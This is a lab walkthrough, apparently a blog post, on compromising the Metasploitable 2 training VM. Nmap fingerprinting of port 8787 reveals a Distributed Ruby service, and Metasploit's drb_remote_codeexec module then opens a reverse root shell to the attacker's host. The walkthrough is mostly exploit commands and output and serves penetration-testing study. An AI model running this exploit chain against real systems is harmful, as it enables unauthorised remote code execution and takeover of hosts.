Metasploitable 2: Port 8787 Open and Unknown

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
8787/tcp  open  unknown

As we can see this Nmap scan did not recognise the service signature running on port 8787 and so I threw a more robust Nmap version detection scan at this:

~# nmap -p 8787 -sV --version-all 192.168.1.103

Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-20 14:03 GMT
Nmap scan report for Unknown-00:0c:29:72:05:d6.home (192.168.1.103)
Host is up (0.081s latency).
PORT     STATE SERVICE VERSION
8787/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port8787-TCP:V=6.25%I=9%D=11/20%Time=528CC14C%P=x86_64-unknown-linux-gn
SF:u%r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb:
SF::DRbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\
SF:x20`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/
SF:usr/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"

The service is still unknown; however, we have some interesting output within the fingerprint which indicates a Ruby program and "DRB" (Distributed Ruby Service) which we can use as a search term within Metasploit:

msf > search drb
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                                   Disclosure Date  Rank       Description
   ----                                                   ---------------  ----       -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  Distributed Ruby Send instance_eval/syscall Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)

The drb_remote_codeexec is the most promising and so we’ll run with that:

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   URI                    yes       The dRuby URI of the target host (druby://host:port)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(drb_remote_codeexec) > set URI "druby://192.168.1.103:8787"
URI => druby://192.168.1.103:8787
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[*] payload executed from file .EbA8isJbAjsgcmD8
[*] make sure to remove that file
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo en2vfxLYQpig5Eku;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "en2vfxLYQpig5Eku\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.70:4444 -> 192.168.1.103:47082) at 2013-11-20 16:26:55 +0000

whoami
root

And we have root.